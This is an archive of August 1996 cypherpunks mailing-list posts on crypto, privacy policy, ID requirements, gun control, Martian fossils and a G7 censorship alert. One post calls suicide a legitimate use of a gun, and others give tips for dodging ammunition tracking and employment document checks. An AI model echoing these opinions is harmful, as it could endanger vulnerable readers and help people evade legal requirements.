> I haven't been able to find the reference, but a month or two ago
> there was an article on the net or in a newspaper about the targets
> of wiretapping - how many wiretaps were for drugs, gambling, tax evasion,
> and of course terrorism.  The number of wiretaps for bombs and guns
> was something low like 80 in the last 5-10 years - about 1/10%. 
>         (Did anybody else see this article??)

The WashPost article that JYA covered, perhaps?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 8 Aug 1996 04:47:12 +0800
To: hallam@ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <19960805204130906.AAB148@maverick>
Message-ID: <199608071538.LAA08433@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phill writes
> Given the number of gun related homicides in the
> US it is not unreasonable to require each individual cartridge
> to be stamped with a serial number and for gun dealers to be 
> required to record each individual purchase.

Phill, as usual, displaying your ignorance?

Many of my friends reload spent brass. I realize that you might not
get this idea, but guns are a technology that hasn't advanced
significantly since 1900 or so, other than maybe lightening things
with plastic stocks. (The few innovations that have been tried, like
trounds and caseless ammo, haven't ever taken off). The result of this
is that a heavy fraction of the people who own guns have the ability
to LOAD THEIR OWN AMMUNITON. Indeed, anyone who wants to can do it!
Even without a PhD!

In fact, lots of cheapskates who like to shoot a lot regularly go out
to ranges and sweep up other people's spent brass. If you open up a
good magazine for those of us who aren't scared of guns, you will see
ads for dozens of inexpensive devices to help you trim and fix cases
in a semi-automated way, and to load ammo mostly by turning a crank.

BTW, such devices are trivial to make yourself, and plans are readily
available. Its all low technology.

Were you not totally ignorant of how guns are used, this wouldn't be
news to you.

Now, on top of that, our ignorant socialist friend seems to forget
that brass is not immutable -- that is, that it would take about
thirty seconds and an awl would get rid of any serial number you cared
to stamp. On an empty case, its even easier.

The real key here is of course that idiots going crazy and killing 20
people in a schoolyard kill fewer people than slippery wet floors, and
the whole thing is so insignificant that it can be ignored. The drug
related killings would go away were drugs legalized, as would a heavy
fraction of the petty crime, and most of the rest of the abuses of
guns are so tiny in comparison to the legitimate uses as to be
insignificant.

(Oh, and by the way, Dr. Hallam-Baker -- I consider suicide, which is
counted in the HCI "statistics" on gun deaths, to be a perfectly
legitimate use of a weapon. Its every person's right to off themselves
any time they like by my way of thinking, and you have no right to
force people to live against their will any more than you have the
right to force them into slavery.)


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Thu, 8 Aug 1996 07:52:35 +0800
To: cypherpunks@toad.com
Subject: Re: Apple people on the li
Message-ID: <v03007807ae2e9c91b674@[204.179.128.38]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 8/6/96 GMT, John Young wrote:
>I'd like to hear Tim, too, in this Big Apple. RealAudio, perhaps.

>What would you offer to set off Tim's simmering crypto-anarcho-volcano,
>make it heard round the planet?

I can't offer much that would satify Tim's needs,  he would have to look
elsewhere for that (I will restrain my comment about a size 12 boot)

The  Mac crtpyo workshop http://webstuff.apple.com/~opentpt/crypto.html is
just that,  a workshop:  a guerilla effort focused at Mac developers who
write code to start including crypto in thier code. I am also sponsering an
effort among developers to do keychain management on the Mac, In a manner
similar to the popular Internet Config. Developers get together, talk,
hack, and go home with plans to write stuff.

What I offer developers is much more important to me right now. people
complain about email apps not having built in crypto, I am trying to do
something about it.  So are folks like Olivier Merenne who does SafeMail
http://www.highware.com/highware/safemail/safemail.htm . these are the
kinds of people that I want to help.

The workshop us not a forum for the very people that Tim complains about,
to rant about how great the Mac is or isnt. or why crypto is good or bad, I
will leave that to the wired.coms  and other non-tech forums out there.

I agree with Tim, If you really want to hear tim talk, you cant ead his
rants on cp or I have a better idea, maybe you can send him some bucks and
he'll send you a cassette tape or something (I would suggest he makes a
quicktime movie and put it on your webpage or do a webcast, but that
requires you buy into the Apple world doesnt it, so maybe you can do the
windoze equiv)

nuff said,
cp


Vinnie Moscaritolo
Apple Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 8 Aug 1996 03:53:00 +0800
To: Declan McCullagh <declan@eff.org>
Subject: RE: Internal Passports
Message-ID: <9607078394.AA839443151@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



I've seen the same problem in a department store in Ottawa. They would not
accept a Canadian Passport as identification for payment by cheque but would
accept various credit cards and similar devices.

My conclusion was that they wanted something that would show my friend's credit
worthiness, not prove his identity.

James

Declan McCullagh <declan@eff.org>
>I had the same problems when I was working at Xerox in Webster, NY. 
>Supermarkets just plain didn't want to accept my passport as valid ID.

>> At 15:48 8/4/96, Bill Stewart wrote:
>> 
>> A US passport is not considered valid ID by the State of Oregon. If
>> somebody here doesn't belive this, send someone who looks like he
>> might be under 21 into any liquor store in Oregon with just an US
>> passport.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 8 Aug 1996 08:13:49 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Internal Passports
In-Reply-To: <RDo0RD45w165w@bwalk.dm.com>
Message-ID: <199608071729.MAA15197@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
| Duncan Frissell <frissell@panix.com> writes:
| > At 12:06 AM 8/6/96 -0700, Marshall Clow wrote:
| >
| > >I have found that promising to provide the necessary docs, and then failing
| > to do so, is the least confrontational and most effective way around this.
| > >
| > >"Delay is the deadliest form of denial"
| >
| > Works for me as well.  Likewise, self employment.
| 
| That's the key word here - I don't think you need I-9 if you get paid on 1099
| or equivalent. However for W-4 employment, the emplyer must send a signed I-9

	This is correct; you don't need an I-9 to work when your wages
are reported via a 1099.

| to los federales. Otherwise the computer will flag this situation and they'll
| get a letter asking why they pay wages to someone whose I-9 isn't on file.

The privacy act statement on the I-9 instructions claims that the form
will be kept on file by the employer, who can be asked for it by the
INS.  This 'we keep it on file' was confirmed by a contracting firm
with whom I did some work recently.  It also has some newspeak that
has to be read to be believed.

ADam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 8 Aug 1996 07:44:08 +0800
To: cypherpunks@toad.com
Subject: Re: PGP public key servers are NOT useful!
In-Reply-To: <199608060552.WAA04209@abraham.cs.berkeley.edu>
Message-ID: <199608071637.MAA08532@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Anonymous MacDonald writes:
> The problem with the PGP public key servers is that
> one has absolutely no control over what gets uploaded there in one's
> own name.

Thats why people are supposed to use the web of trust to check the
keys. You claim to make your key available by finger. How do you know
that Mallet isn't switching the bits as they go down the wire to your
correspondants? The only way to verify a key is to check known good
signatures on it. Because of this, no security is needed on key
storage facilities per se -- you aren't supposed to trust keys without
signatures.

Geesh. I thought this was obvious. I guess not.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 8 Aug 1996 08:40:34 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: appropriate algorithm for application
In-Reply-To: <2.2.32.19960806232209.006e2c84@gonzo.wolfenet.com>
Message-ID: <199608071703.NAA07097@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>I need an algorithm/protocol that is capable of encrypting numerous
>files with separate keys, but there also needs to be a master key
>that will be able to decrypt all of them.  Is there such a system 
>that is relatively secure?  I'd prefer the system to be as secure
>as possible, but in this application, security is secondary to 
>functionality.  Thanks... //cerridwyn//
>


If you need this "master key" feature embedded in the cryptosystem
itself, you're probably out of luck - such a cipher would be at least
as slow as a public key cryptosystem.  See Blaze, Feigenbaum, Leighton,
"Master-Key Cryptosystems", CRYPTO '96 rump session, available at
ftp://research.att.com/dist/mab/mkcs.ps .

However, you could simulate the function of such a system by
selecting a different key for each file and then encypting each unique
file key with the master encryption key (which could be a public
key or a symmetric key, depending on whether the application that
encrypts the files is trusted to know the master decryption key).
This has the disadvantage, however, of requiring that you store
the encrypted file key with each file, which may or may not be
an issue for you.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 8 Aug 1996 15:33:46 +0800
To: alano@teleport.com>
Subject: Re: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
Message-ID: <199608080454.VAA04870@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:08 AM 8/7/96 GMT, Brian C. Lane wrote:
>  A slight correction. They are imposing a 6% tax on the Gross receipts of
> all Internet Providers who have customers in Tacoma. This includes AOL,
> Compu$erve, and my local favorites - aa.net and eskimo.com

So if someone has six thousand customers, one of whom is in Tacoma, they
want six percent of his gross on the other 5999 customers?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 8 Aug 1996 14:14:33 +0800
To: Scott Schryvers <cypherpunks@toad.com
Subject: Re: [Noise] Mars Needs Lifeforms
Message-ID: <2.2.32.19960807201915.00b01754@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:20 AM 8/7/96 -0500, Scott Schryvers wrote:
>NBC News at Sunrise has just announced the discovery of alien life on the 
>planet Mars.  The lifeform that became extinct more than 2 billion years
>ago was found as a fossil in a meteor that originated from mars and landed
>on earth.  The fossil found was a primitive germ life form.

But did it use encryption?
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 8 Aug 1996 08:56:31 +0800
To: cypherpunks@toad.com
Subject: F2 hash?
Message-ID: <199608072029.NAA29976@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a descriptoin of the F2 hash?
F2 is a secret hash from SecurityDynamics, and is used in
their client software.  (Its not the hash in the cards, but
if anyone has a copy of that, it might be fun.)

I'd be very interested in seeing source code in the public
domain to try out a few hacks...

Anyone?  Anyone?  Bueller?

Bueller?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 8 Aug 1996 09:03:43 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re:Wee Beasties on Mars [NOISE]
Message-ID: <v02140b02ae2ebc31d032@[204.179.131.165]>
MIME-Version: 1.0
Content-Type: text/plain


> > schryver@radiks.net:
>
> > > NBC News at Sunrise has just announced the discovery of alien life on the
> > > planet Mars.  The lifeform that became extinct more than 2 billion years
> > > ago was found as a fossil in a meteor that originated from mars and landed
> > > on earth.  The fossil found was a primitive germ life form.
>
> NASA is holding a news conference today to discuss the find.  I must
> admit I am curious as to how they determined the meteor's origin.
> Most material in the solar system is similar in composition.

Using the same methods that geologists use to determine whether or not
certain meteorites are from the moon, by chemical composition.  Material from
within the solar system actually has varied composition mainly determined by
the distance of the body from the Sun (there are various theories as to why
this is, an intro cosmology book will describe them all in detail), the
actual percentages of various elements and compounds can be used to make a
reasonable guess as to whether or not a particular meteorite was knocked off
of a planet or moon to which we have sent a probe.  For example, it is
possible to buy fragments of "moon rocks" which are not actually samples
returned from Apollo missions (which are all owned by the U.S. government)
but are from meteorites which match the exact chemical and physical
composition of the returned lunar samples.  Such determinations are a lot
easier for planets/moons which do not have active vulcanism or other events
which significantly mix up the composition of the planet.

At the news conference given this afternoon the fact that the meteorite was
Martian in origin was probably the least controversial.  It seems that
exobiology may no longer be a field without a subject :)  If the results are
confirmed what I think will end up being the most interesting fallout of this
will be in the creationism/evolution debate.  It seems that life may have
been independantly generated at multiple locations, barring a "space seed"
debate flaring up again, and the "impossible odds" argument has become pretty
weak...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Thu, 8 Aug 1996 09:30:51 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: crypto CD source
In-Reply-To: <199608060504.GAA00115@server.test.net>
Message-ID: <Pine.SUN.3.91.960807140506.3525A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Aug 1996, Adam Back wrote:

> 
> Cypherpunks archive?
> 
> 	http://infinity.nus.sg/cypherpunks/
> 
> The earlier archives were at www.hks.net, try mailing cactus@hks.net.


I've a bunch of .gz files for the filtered cypherpunks list I run, they 
should contain stuff as far back as last year.  How would I get these to 
ya?

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Thu, 8 Aug 1996 11:50:29 +0800
To: cypherpunks@toad.com
Subject: RE: Internal Passports
Message-ID: <2.2.32.19960807194053.0096f9ac@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 8/7/96 EST, jbugden@smtplink.alis.ca wrote:
>
>I've seen the same problem in a department store in Ottawa. They would not
>accept a Canadian Passport as identification for payment by cheque but would
>accept various credit cards and similar devices.
>
>My conclusion was that they wanted something that would show my friend's credit
>worthiness, not prove his identity.

Being employed by a department store, and working closely with our trainers
and our loss prevention people, for the last ten years has given me a pretty
good vantage point into seeing what actually happens on the sales floor as
well as what goes into the policy manual.

I'd suggest that it's probably an oversight by their training department.
Their trainers are just humans that looked around one day and said, "we need
to define what an ID is."  They Xeroxed a couple of dummied-up driver's
licenses and provincial ID cards, pasted them in a book, and said, "there,
that looks like all the acceptable ID I've ever seen around here."  Using
passports as internal ID is not a common occurrance, and this usage probably
simply didn't occur to the trainers.  It almost certainly was not the
"fault" of the person on the sales floor; they're usually trained to look at
these pretty pictures in a procedures book, and deny anything else.

That said, it certainly *could* be true that their loss prevention or credit
or audit departments decided that only "credit-worthy" people should be able
to write checks.

On the whole, though, I have been finding that people ascribe all sorts of
paranoid evils to all sorts of organizations, when the ultimate truth
usually starts out more like a Dilbert cartoon.  Internally, I can usually
spot the truly evil corporate deception practices.  Externally, though,
people can only make guesses based on actions that they've become party to.
And who can blame someone for that?

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 8 Aug 1996 03:02:55 +0800
To: cypherpunks@toad.com
Subject: Mena
Message-ID: <199608071506.PAA13182@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, August 7, 1996, p. A6. 
 
 
   CIA Probed in Alleged Arms Shipments 
 
      Reports Claim Agents Involved in Arkansas-Nicaragua Drug 
      Swaps 
 
   By Susan Schmidt 
 
 
   The CIA's inspector general is investigating claims that 
   U.S. intelligence agencies were involved in illegal arms 
   shipments and drug smuggling at an isolated airstrip in 
   Mena, Ark., during the years Bill Clinton was governor. 
 
   A spokesman for the CIA said Inspector General Frederick P. 
   Hitz is preparing a report on allegations that the CIA was 
   involved in arms shipments from Mena to the Nicaraguan 
   rebels during the 1980s, and that pilots hired by the 
   agency brought back large shipments of cocaine. 
 
   CIA spokesman Mark Mansfield said the inspector general 
   will report on possible contacts between the agency and 
   Arkansas state officials during the 1980s. His report also 
   will deal with allegations that the CIA attempted to 
   influence or curtail law enforcement investigations of 
   Mena. 
 
   Hitz was asked to investigate the Mena airport by CIA 
   Director John M. Deutch, who was acting on a request from 
   House Banking Committee Chairman Jim Leach (R-Iowa). 
   Leach's panel is looking into the possible laundering of 
   drug money generated at Mena. 
 
   Leach's Banking Committee staff has been looking a variety 
   of claims about Mena emanating from a collection of 
   Arkansas law enforcement officials and various figures 
   operating in the shadowy netherworld on contract with 
   intelligence agencies. 
 
   One congressional investigator likened sorting through the 
   allegations to being trapped in "a hall of mirrors." 
 
   Congressional sources said Leach made the request to the 
   CIA about six months ago and expects a report from Hitz in 
   late summer or early fall. 
 
   The latest Mena claims are contained in "Boy Clinton," a 
   book by American Spectator Editor R. Emmett Tyrrell 
   published this week. In it, Tyrrell asserts that Clinton 
   knew about CIA operations and cocaine smuggling at Mena. 
 
   He cites as sources Arkansas state troopers, including one 
   on the governor's security detail who says he was also a 
   contract employee for the CIA during the mid-1980s and 
   informed Clinton of what was going on at Mena. 
 
   Clinton has said he had nothing to do with any activities 
   at Mena. "Mena is the darkest backwater of the right wing 
   conspiracy industry," said White House spokesman Mark 
   Fabiani. "The allegations are as bizarre as they are 
   false." 
 
   [End] 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 8 Aug 1996 09:35:31 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: STEGO GUNS
In-Reply-To: <199608072128.HAA28140@suburbia.net>
Message-ID: <Pine.SUN.3.91.960807150329.28064G-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 8 Aug 1996, Julian Assange wrote:

> Correlation != causation. What are the figures on other crimes?

I'm waiting for the official study itself, but the article did
say that the study showed a shift from violent crimes to property
offenses.  If so, that's a trade I'll make any day.  

I'll see if I can get a copy of the study when it is released.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Aug 1996 09:49:56 +0800
To: cypherpunks@toad.com
Subject: Re: Wee Beasties on Mars
Message-ID: <199608072246.PAA25637@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 AM 8/7/96 -0700, Mike Duvos wrote:
>> schryver@radiks.net:
>
>> > NBC News at Sunrise has just announced the discovery of alien life on the 
>> > planet Mars.  The lifeform that became extinct more than 2 billion years
>> > ago was found as a fossil in a meteor that originated from mars and landed
>> > on earth.  The fossil found was a primitive germ life form.
>
>NASA is holding a news conference today to discuss the find.  I must 
>admit I am curious as to how they determined the meteor's origin.  
>Most material in the solar system is similar in composition.  

I've only seen a few vague news items on TV about this.  I believe they said 
that gases in pores in the rock matched the constituents of the Martian 
atmosphere.  

Also, they said that the rock was a bit less than the size of a football, 
and was found in Antarctica.  It's fairly "clean" there, at least from the 
standpoint of organic contamination.  Also, while I've heard nothing of its 
exact physical location, if it is in the middle of a large ice sheet that 
pretty much excludes terrestrial origin, because there is a limit to how far 
a volcano on Earth can blow a rock.  In any case, the kind of rocks 
typically ejected from volcanoes are well known.

Once it's agreed to be from "out there," the question is where.  If it had 
been possible to bring back rock from the landers that have analyzed Mars, a 
direct comparison would have been possible.  (of course, if that had been 
possible, we'd have heard about it already...)    The moon is excludable, 
since it has no atmosphere and apparently never had one.  (as well as the 
fact that we have samples of the moon to compare.)  Venus is highly 
unlikely, because it has such a thick atmosphere that material would 
probably not escape were a meteor to hit.  Mercury is even more unlikely, 
because it would probably take way too much energy to raise the 
sun-gravitational potential of a fragment of Mercury to that of the earth.

Jupiter, Saturn, Uranus and Neptune are basically liquified gases, so there 
would be no rocky material to eject.  Jupiter's moons are a different issue.

Anyway, I've got to get back to reviewing some episodes of "My Favorite 
Martian", just in case...


 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 8 Aug 1996 09:29:38 +0800
To: John Deters <jad@dsddhc.com>
Subject: RE: Internal Passports
Message-ID: <9607078394.AA839458951@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain




----------
From:   John Deters <jad@dsddhc.com>
Sent:   Wednesday, August 07, 1996 3:35 PM
To:     James Bugden
Subject:        RE: Internal Passports

At 11:39 AM 8/7/96 EST, jbudgen@alis.com wrote:
>
>I've seen the same problem in a department store in Ottawa. They would not
>accept a Canadian Passport as identification for payment by cheque but would
>accept various credit cards and similar devices.
>
>My conclusion was that they wanted something that would show my friend's credit
>worthiness, not prove his identity.

John Deters <jad@dsddhc.com> wrote:
>On the whole, though, I have been finding that people ascribe all sorts of
>paranoid evils to all sorts of organizations, when the ultimate truth
>usually starts out more like a Dilbert cartoon.  Internally, I can usually
>spot the truly evil corporate deception practices.  Externally, though,
>people can only make guesses based on actions that they've become party to.
>And who can blame someone for that?

In the case cited above, I confirmed with the store's credit department that a
Canadian passport was not considered a valid piece of ID. I suggested that this
was due to credit concerns but they denied this. For obvious reasons, I did not
believe them.

My opinion is that a rule that stated "two pieces of ID that showed credit
worthiness" was either too complicated or too unpalatable to use. Instead, the
rule is "two pieces of ID" with the definition of ID tacitly restricted to items
that indicate credit status. Either that, or Canadian passports are too easy to
get forged in Ottawa.

This "keep it simple stupid" approach showed itself this week when I attempted
to order replacement cheques from my bank over the phone. I was told that they
needed my signature, but a signed fax request would be sufficient. I remarked
that it was trivial to apply a forged signature to a fax. The response from the
person was - wait for it - that I would then have to come in and sign for it in
person. It was impossible to convince them that this was not just a problem with
my fax machine, but a problem in general.

Eventually, I typed up a fax request in Word, pasted in my previously scanned
signature, and sent this to the bank. This made them happy, but I might be
changing banks soon.

In the physical world, a big lock or a steel door can indicate good security.
Most people can evaluate the strength of this type of security fairly well.
Until we have good analogies for the equivalent types of digital security, we
will continue to face real problems.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 8 Aug 1996 09:29:29 +0800
To: cypherpunks@toad.com
Subject: G7 Threat Alert from international Net-coalition (8/7/96)
Message-ID: <v01510108ae2ebee4255a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Wed, 7 Aug 1996 12:27:21 -0500
To: fight-censorship@vorlon.mit.edu
From: declan@well.com (Declan McCullagh)
Subject: G7 Threat Alert from international Net-coalition (8/7/96)
Sender: owner-fight-censorship@vorlon.mit.edu

[Redistribute widely. Add'l info at http://www.eff.org/~declan/global/ --Declan]



======================================================================
   ALERT FROM A COALITION OF ONLINE CIVIL LIBERTIES ORGANISATIONS

            G7 THREAT TO ONLINE FREE SPEECH AND PRIVACY

      IN THE NAME OF COMBATING TERRORISM THE G7 IS PLANNING TO
     CURB THE FREE SPEECH RIGHTS AND PRIVACY OF INTERNET USERS

                           7 AUGUST 1996

   PLEASE REDISTRIBUTE THIS DOCUMENT WIDELY WITH THIS BANNER INTACT
 REDISTRIBUTE ONLY IN APPROPRIATE PLACES & ONLY UNTIL 30 SEPTEMBER 96

______________________________________________________________________
IN THIS ALERT:
  Summary
  Background
  What You Can Do
  Where Can I Learn More?
  Organisations

______________________________________________________________________
SUMMARY

On July 30th the G7 group of nations met in Paris to discuss terrorism.
Among other responses the G7 have endorsed a number of restrictions and
controls on the Internet.  These include the prohibition or censorship
of sources that may contain "dangerous" information, restrictions on
the electronic speech of unpopular political organisations, and the
imposition of "key escrow" or other means of allowing governments to
violate privately encrypted correspondence.

This particularly serious threat, which originates from recent events
such as a bombing at the Atlanta Olympics and the crash of TWA Flight
800, is another case in a long list of attempts to restrict freedom of
speech in electronic networks, of which there are alarming examples in
many countries including Australia, Belgium, China, France, Germany,
Saudi Arabia, Singapore, the USA and Vietnam, under a variety of
pretexts ranging from "pornography" to "terrorism" and incorrect
political opinion.

* The "offensive" material being targeted is no different from similar
material available in libraries and bookshops.  *What is legal offline
must also be legal online*.  If material cannot be censored at the
newsstand or the university library, it must not be censored in the
online newsstands and libraries of our future.

* Legislators and agency officials are pushing for speedy passage of
censorious and privacy-harming laws, capitalising on fear of terrorism
to exclude meaningful public input in the process and substance of
these regulations.

* Because the Internet is global, and every culture has its own rules
about what is and is not permissible, the open nature of the Internet
must be protected.  No local jurisdiction should be allowed to impose
its rules on the rest of the world.

______________________________________________________________________
BACKGROUND

This alert is being issued by a coalition of online civil liberties
organisations that support online privacy, freedom of speech and human
rights.  The organisations are listed at the end of this alert along
with contact details.

Since its inception the Internet has more than doubled in size every
year.  If this growth continues, more than one billion people will be
using the Internet by the turn of the century.  Each of these users can
as easily publish material as they can read it.  The Internet has the
potential vastly to improve the workings of democratic government and
to spread liberty across the globe.

In light of recent bombings in the US and elsewhere, there are again
calls to ban from the Internet information on explosives, as well as
any other issues that can be related to "terrorism".  Anti-terrorist
hysteria has become the excuse for governmental attempts to circumvent
online freedom of expression, guaranteed by constitutions, laws, and
the UN Declaration of Human Rights.

Information on how to make bombs, as well as other things that would be
"banned", is widely available, often from the very governments pushing
for censorship.  Banning such publications from the Internet won't
make it any less widely available.  However it could become the tool
for the censorship of any debate or opinion which happens to displease
the authorities, or "pressure groups" that do not share those opinions.
This is a pure and simple violation of free speech, no matter how it
is disguised.

Currently, communicating via the Internet is like sending messages on
postcards.  Anyone between the sender and receiver can read the
message.  Encryption (data scrambling) technology can be used to ensure
the privacy of communications.  It's like placing  messages in
envelopes.  Although widely available the technology has not yet become
a part of the Internet because of pressures from the "intelligence" and
law enforcement agencies.

Some countries, such as the United States, treat cryptography as if
were a weapon, like missile or a machine gun, and ban its export.
Other countries, such as France, have an outright ban on cryptography.
Such policies threaten to undermine information infrastructure not only
locally, but globally, leaving computer networks open to industrial
espionage, and as we are seeing in recent news of electronic spying on
the European Parliament, even governmental espionage, as well as
criminal exploitation.

What the G7 have called for is a way to read all messages sent by
terrorists.  The only way they can achieve this is to have some way of
reading messages sent by anyone.  What the G7 are demanding is that the
privacy of all communications be compromised in the name of protection
from terrorism.  However, no real terrorist is going to use such a
compromised system when uncrackable alternatives already exist and are
freely available.  Effectively G7 are demanding that we all compromise
the privacy of our communications - for NO benefit.

______________________________________________________________________
WHAT YOU CAN DO

1. Be alert to what your government is doing or planning.  Contact your
   law-makers and urge them to protect privacy and free speech on the
   Internet.  Write to or call publications in your area and suggest
   that they report on any anti-freedom government action you hear
   about.

2. Join an online civil liberties organisation.  See the end of this
   release for contact information for several such organisations.

3. If there isn't an online civil liberties organisation in your
   country, why not start one?   Some suggestions on how to start an
   online civil liberties organisation are available at:

   http://pobox.com/~mbaker/creating.html

   and

   http://www.well.com/~jonl/bonfire.html

______________________________________________________________________
WHERE CAN I LEARN MORE?

Further details on the G7 meeting and its effect on the Net can be
found in a press release from the Global Internet Liberty Coalition:

  http://www.aclu.org/gilc/index1.html

For a summary of efforts around the world to censor the Internet see
the "10 May 96 Silencing the Net" report on the Human Rights Watch
gopher site:

  gopher://gopher.igc.apc.org:5000/11/int/hrw/general

For background on global efforts to muzzle the Net see these web sites:

  http://www.eff.org/~declan/global/
  http://www.eff.org/~declan/fight-censorship/
  http://www.io.org/~sherlock/doom/threat.html

For information on global and international online freedom issues see
the Electronic Frontier Foundation web site:

  http://www.eff.org/pub/Global/

Translations of this alert will be available as follows:

  Catalan:  http://www.lander.es/~jlmartin/
  French:   pforsans@in-net.inba.fr
  Italian:  http://www.nexus.it/alcei.html
  Spanish:  http://www.lander.es/~jlmartin/

________________________________________________________________________
ORGANISATIONS

The following organisations have issued this alert:

ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei.html
CITADEL - Electronic Frontier France * pforsans@in-net.inba.fr
EFF-Austin (Texas) * http://www.eff-austin.org
Electronic Frontier Foundation (USA) * http://www.eff.org
Electronic Frontier Canada * http://www.efc.ca/
Electronic Frontier Ireland * http://www.efi.ie/
Electronic Frontiers Australia * http://www.efa.org.au
Elektronisk Forpost Norge (Electronic Frontier Norway) *
  http://www.sn.no/~efn
Fronteras Electronicas Espan~a (Electronic Frontiers Spain) *
  http://www.lander.es/~jlmartin/
HotWired * http://www.hotwired.com/
Human Rights Watch * http://www.hrw.org
Reporters sans frontieres * http://www.calvacom.fr/rsf/

Press Contacts:

Please choose an organisation above and visit their web site for contact
information.

________________________________________________________________________
                           End Alert
========================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Thu, 8 Aug 1996 13:39:24 +0800
